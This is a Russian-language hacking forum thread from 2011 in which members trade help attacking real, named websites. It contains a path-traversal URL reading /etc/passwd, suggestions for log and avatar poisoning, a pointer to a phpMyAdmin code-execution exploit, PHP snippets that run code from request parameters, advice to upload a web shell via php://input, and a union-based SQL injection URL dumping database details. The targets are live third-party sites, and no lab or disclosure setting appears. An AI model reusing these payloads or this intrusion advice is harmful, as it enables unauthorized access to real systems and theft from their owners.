Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    608
    Reputations:
    1,101
    А почему бы и нет? Только одинарные кавычки здесь не к чему.
    Code:
    <?php
    $a = "$_SERVER[DOCUMENT_ROOT]";
    echo $a;
    ?>
    
    И фигурные скобки, и кавычки могут экранироваться :)
     
    #17381 randman, 20 Jul 2011
    Last edited: 20 Jul 2011
  2. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    476
    Likes Received:
    190
    Reputations:
    221
    ну так круче, инфа проверена
     
  3. swat_

    swat_ Member

    Joined:
    4 Nov 2009
    Messages:
    138
    Likes Received:
    30
    Reputations:
    1
    http://seafightclub.com/index.php?page=../../../../../../../../etc/passwd%00
    что можно сделать с этим? =(
    в пхп не силён
     
  4. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    во первых можно пробовать метод Slesh а, через Webalizer

    http://seafightclub.com/index.php?page=../../stats/index.html%00

    во вторых там есть форум, пробуй аватарку

    в третих там ПМА есть, смотри версию..

    а про environ и тп забудь, пхп тут cgi программа
     
    _________________________
    1 person likes this.
  5. swat_

    swat_ Member

    Joined:
    4 Nov 2009
    Messages:
    138
    Likes Received:
    30
    Reputations:
    1
    1 не канает :(

    2 тоже не работает :(

    3 пма не бажный :(
     
  6. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886

    что значит "не канает" ?
     
    _________________________
  7. swat_

    swat_ Member

    Joined:
    4 Nov 2009
    Messages:
    138
    Likes Received:
    30
    Reputations:
    1
    в смысле не работает
    а тут http://seafightclub.com/usage_201107.html

    Not Found
    The requested URL /usage_201107.html was not found on this server.

    да и домашней папки нет WebAlizer а
     
  8. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    http://seafightclub.com/index.php?page=../../stats/usage_201107.html%00

    папка /stats/ это и есть домашняя папка вебалайзера =\
     
    _________________________
    #17388 Konqi, 20 Jul 2011
    Last edited: 20 Jul 2011
  9. swat_

    swat_ Member

    Joined:
    4 Nov 2009
    Messages:
    138
    Likes Received:
    30
    Reputations:
    1
    еще есть какие нибудь варианты? :(
     
  10. expupkin

    expupkin New Member

    Joined:
    15 Jan 2010
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Подскажите каким софтом пользоватся чтобы находить всяческие бэкапы, changelogs, и другие полезные файлы на сайте ?
     
  11. swat_

    swat_ Member

    Joined:
    4 Nov 2009
    Messages:
    138
    Likes Received:
    30
    Reputations:
    1
    ArxScanSite
     
  12. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,037
    Likes Received:
    531
    Reputations:
    935
    Там есть phpmyadmin, и все условия для работы этого сплоита:
    http://snipper.ru/view/103/phpmyadmin-33102-3431-session-serializer-arbitrary-php-code-execution-exploit/

    Я перепроверил ;)
     
    _________________________
  13. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    608
    Reputations:
    1,101
    Ну тогда уж стоит сказать, что можно выполнять код без вставки огораживающих кавычек.
    PHP:
    <?php
    $a 
    "{$_GET['as']($_GET['eval'])}";
    echo 
    $a;
    //?eval=phpinfo()
    ?>
    Уязвимости такого типа встречаются нередко.
     
    #17393 randman, 21 Jul 2011
    Last edited: 21 Jul 2011
  14. M1ks

    M1ks Elder - Старейшина

    Joined:
    23 Aug 2007
    Messages:
    149
    Likes Received:
    9
    Reputations:
    0
    http://mail.pnz.ru/face/action.php?action=aff_mail&mail=7&verbose=0&lang=../../face/index это пхп инъекция? если да, то че с ней сделать можно?)
     
  15. Sc0rpi0n

    Sc0rpi0n Banned

    Joined:
    23 Feb 2010
    Messages:
    75
    Likes Received:
    22
    Reputations:
    16
    Есть php инъекция c mq=off, Но там врублен open_basedir.
    Можно ли с применением новых техник типа
    data:,
    php://stdin
    - php://stdout
    - php://stderr
    - php://output
    - php://input

    и т.п. сделать читалку, чтобы читать исходники а не инклудить
     
  16. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    608
    Reputations:
    1,101
    Через php://input выполнить код, который и будет читать файлы. Однако легче будет залить шелл.
    https://forum.antichat.ru/thread232773.html

    Так же не забудь о загрузке аватаров и т. п.
     
    #17396 randman, 21 Jul 2011
    Last edited: 21 Jul 2011
  17. plaeer

    plaeer New Member

    Joined:
    8 Mar 2011
    Messages:
    149
    Likes Received:
    3
    Reputations:
    1
    Приведите кто-нибудь пример. Каким образом с помощью пхп юзать скули через пост.
     
  18. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    http://forum.antichat.ru/showpost.php?p=2580704&postcount=16410
     
    _________________________
    1 person likes this.
  19. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    729
    Likes Received:
    95
    Reputations:
    12
    Вот к примеру скуль
    http://www.riviera-crimea.com/detail.php?id=425
    Как пошагово ее раскрутить до такого вида раскручивать ручками
    http://www.riviera-crimea.com/detail.php?id=-425'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,user(),version(),database()),15,16+--+

    Вопрос еще такой почему если мы убираем или ковычку или знак минуса то скуль невыводит результат. От чего это зависит?
     
  20. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    792
    Likes Received:
    349
    Reputations:
    120
    а я думал ты хакир %)
    https://forum.antichat.ru/thread217895-sql+faq.html
     
    3 people like this.
Loading...
Thread Status:
Not open for further replies.